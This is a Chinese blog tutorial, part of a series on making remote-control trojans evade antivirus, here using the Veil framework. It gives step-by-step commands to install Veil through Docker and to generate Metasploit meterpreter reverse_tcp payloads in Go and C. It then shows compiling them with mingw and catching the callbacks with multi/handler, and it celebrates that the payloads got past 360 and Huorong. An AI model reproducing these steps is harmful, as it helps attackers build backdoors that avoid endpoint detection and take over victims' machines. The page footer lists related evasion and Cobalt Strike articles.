远控免杀5---Veil免杀

0x01 免杀能力一览表

在这里插入图片描述

  • 1、下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
  • 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
  • 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。
  • 4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

0x02 前言

Veil、Venom和Shellter是三大老牌免杀工具,虽然说人怕出名猪怕壮,但目前这几款免杀工具在扩展性和免杀能力方面依然有着不错的表现。

Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。

0x03 安装Veil

常规安装失败

veil地址:https://github.com/Veil-Framework/Veil

安装参考https://www.freebuf.com/sectool/89024.html

kali快速安装

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

在这里插入图片描述
看起来没什么问题,但后来在执行的时候各种出错,依赖包各种出问题,无论是快速安装还是常规手工安装都没能解决。网上也有很多人吐槽安装比较繁杂,出现各种状况,但也有的系统安全比较顺利。

后来,发现有人做好了veil的docker镜像,简单便捷,一键运行。

Docker安装

安装docker

apt-get install docker docker-compose

在这里插入图片描述
安装完成后启动:

service docker start

在kali里安装docker后,添加docker加速镜像地址vi /etc/docker/daemon.json


{"registry-mirrors": ["https://1nj0zren.mirror.aliyuncs.com","https://docker.mirrors.ustc.edu.cn","http://f1361db2.m.daocloud.io","https://registry.docker-cn.com"]
}

然后重启docker服务

systemctl daemon-reload
systemctl restart docker

拉取veil镜像

docker pull mattiasohlsson/veil

在这里插入图片描述
拉取成功后,执行

docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

-v /tmp/veil-output:/var/lib/veil/output:Z是将宿主机的/tmp/veil-output目录映射到docker里面,这样veil生成的payload可以直接在宿主机里使用。
在这里插入图片描述
使用exit命令退出,使用下面命令查看container

docker ps -a

之后再进入镜像可以在启动镜像后使用下面命令:


docker start -ai a323f16bcf59 (替换成自己查的ID)

在这里插入图片描述
运行起来后,之后再进入镜像可以在启动镜像后使用下面命令

docker exec -it a323f16bcf59 (替换成自己查的ID) /bin/bash

执行veil命令可启动,版本为3.1.1。
在这里插入图片描述

0x04 veil使用

veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。
我们一般选择Evasion:
在这里插入图片描述


Veil>: use 1                   #选择Evasion功能
Veil/Evasion>: list            #查看payload列表

使用list可以看到到41种stager
在这里插入图片描述
推荐使用以go和ruby语言encode的编码方式。像python这类的与用户有较高的交互就容易被查杀。

veil原理可以参考这篇文章:https://xz.aliyun.com/t/4191

1、使用veil直接生成exe

veil可以直接生成支持msf的payload,我们先试一下看看效果。
我们使用go语言生成msf的payload


Veil/Evasion>: use 16

在这里插入图片描述
设置好msf的监听主机和端口就可以,下图所示

set lhost 192.169.128.142
set lport 5555
generate

在这里插入图片描述
然后再设定好生成的payload的名称,我这里就用go_msf了
在这里插入图片描述
然后一堆编码编译之后,就生成payload了
在这里插入图片描述
因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
在msf中监听:

use multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 3334
msf5 exploit(multi/handler) > set lport 10.211.55.2
msf5 exploit(multi/handler) > exploit

在测试主机执行go_msf.exe,发现msf中可上线
在这里插入图片描述
而此时是正常打开360和火绒的
在这里插入图片描述
Veil真NB!
虽然查杀率还比较高,不过火绒和360都能静态+动态免杀。比较遗憾的是生成的exe文件比较大,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。

2、使用veil+mingw-w64

先用veil生成shellcode

use 7

在这里插入图片描述


[c/meterpreter/rev_tcp>>]: set lhost 192.168.142.134
[c/meterpreter/rev_tcp>>]: set lport 5555
[c/meterpreter/rev_tcp>>]: generate

在这里插入图片描述
输入生成文件名为c_msf
在这里插入图片描述
文件在/tmp/veil-output/source文件夹下
先生成一个可以被 msf 利用的 c_msf.c 然后用mingw-w64 来编译
mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134

gcc -o payload.exe c_msf.c -l ws2_32

运行生成的payload.exe文件,msf成功上线
在这里插入图片描述
全程开启360卫士和杀毒以及火绒,编译、运行、上线都没有问题。
在这里插入图片描述

0x05 小结

veil功能还是很强大的,生成的shellcode自身免杀能力就不错,而且支持多种语言的shellcode编译打包,和msf及cs可以无缝对接,值得人好好研究一下。三大老牌免杀工具不是浪得虚名的

0x06 参考整理

使用veil绕过杀软:https://blog.csdn.net/wyf12138/article/details/79825833

免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html

APT级的全面免杀:https://xz.aliyun.com/t/4191

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/380286.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

远控免杀专题6---Venom免杀

0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

查看ajax传来的数据,jQuery AJAX 方法 success()后台传来的4种数据

1.后台返回一个页面js代码/**(1)用$("#content-wrapper").html(data);显示页面*/$.ajax({async : false,cache : false,type : POST,url : area/prepareCreate,error : function() {alert(smx失败 );},success : function(data) {$("#content-wrapper").ht…

远控免杀专题7 ---shellter免杀

0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

将文件拖到docker容器里,将docke 容器里文件拖到宿主里

docker将/root/shell目录下的putty.exe复制到容器内部: 查看容器ID: docker ps 复制: docker cp /root/shell/putty.exe 容器ID:/root docker将容器内部的/root/shell/payload.exe复制到宿主里: docker cp b8d6b6b6296d:/root…

拜托,出来混有点专业精神好不好

2007年5月25日的安徽日报头版中武警防汛大演练照片如下:很明显的最上面的两艘船是一样的,甚至连激起的浪花都相同,真不知道ps这幅图的同学当时怎么想的,一点专业精神都没有撒~再看看下面的盗版光碟《十面埋妇》的包装&…

远控免杀专题8---BackDoor-Facktory免杀

0x01 免杀能力一查表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

C和汇编----存储类别、链接和内存管理

0x01 存储类别 1、作用域 一个C变量的作用域可以是块作用域、函数作用域、函数原型作用域或文件作用域。 1.1 块作用域: 块是用一对花括号括起来的代码区域。比如函数体就是一个块。定义在块中的变量具有块作用域,块作用域变量的可见范围是从定义处到包…

服务器appcrash的问题怎么修复,ghost win7出现appcrash的问题怎么修复

ghost win7出现appcrash的问题怎么修复一位用户说在win7旗舰版电脑中运行程序会出现appcrash错误的提示,appcrash出错想必很多用户都遇到过,也不知道什么原因引起的,导致程序无法正常运行。那么有什么方法可以解决ghost系统win7运行程序出现a…

远控免杀专题9 --- Avet免杀

0x01 免杀能力一查表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

WF随笔系列之三 --- Code Activity 专题

系列目录:WF随笔系列之三 Out-of-the-Box Activities 专题目录 Code Activity是WF开发中使用最频繁的Activity之一,它要做工作的很简单,就是把一个或者几个Code Exec 一下,当此行为在执行时,触发一个Handlers:Execute…

A5流密码算法

0x01 A5/1流密码算法的基本用法 作用: 用于蜂窝式移动电话系统语言和数字加密 过程: A5/1算法用于用户的手机到基站之间的通信加密,通信内容到基站后先解密变成明文,然后再进行基站到基站之间,以及基站到用户手机之间…

远控免杀专题10--TheFatRat免杀

0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

远控免杀专题11-Avoidz免杀

0x01 免杀能力一查表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

CAP与流密码

CAP 中流密码的操作 1 、Cipher 下拉菜单中选中Stream 2,设置LFSR 参数,设置好参数后点击Set Key LFSR Size:表示有几个寄存器 Initial key:寄存器的初始状态,每个寄存器初始值是0或1,放在一起转化成十六进制 Feedbac…

结构和其他数据形式

0x01 结构声明 结构声明(structure declaration)描述了一个结构的组织布局。 struct book{char title[MAXTITL];char author[MAXAUTL];float value; };该声明描述了一个由两个字符数组和一个float类型变量组成的结构。该声明并未创建实际的数据对象&am…

添加LinkServer的两句代码

sp_addlinkedserver linkserver,,SQLOLEDB,linkserver.comsp_addlinkedsrvlogin linkserver,false,null,sa,asdf第一句是添加一个名字为linkserver的链接服务器 地址是linkserver.com第二句是针对第一句添加的Linkserver添加一个访问帐号两句不能同时执行 要第一句执行成功后执…

Cobaltstrike4.0系列教程(一)----简介与安装

0x01-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个…

qt 试用 (3)配置编译源代码及调试

qt 试用 (3)配置编译源代码及调试qt creater是一个集成ide,像vc一样容易使用,所以首先下载带qt creater的qt sdk Offline installer - 1.4 GB http://qt.nokia.com/downloads/sdk-windows-cpp-offline这里的lib没有pdb和源代码…

cobaltstrick4.0系列教程(2)---用户接口

0x01 概述 Cobalt Strike 用户接口分为两部分。接口的顶部是会话或目标的视觉化展示。接口的底部展示了每个你与之交互的 Cobalt Strike 功能或会话的标签页。你可以点击这两部分之间的区域、按你的喜好重新调整这两个区域的大小。 0x02 工具条 Cobalt Strike 顶部的工具条…

cobalt strick 4.0系列教程(3)---数据管理

0x01 概述 Cobalt Strike 的团队服务器是行动期间 Cobalt Strike 收集的所有信息的中间商。Cobalt Strike 解析来自它的 Beacon payload 的输出,提取出目标、服务和凭据。 如果你想导出 Cobalt Strike 的数据,通过 Reporting → Export Data 。Cobalt S…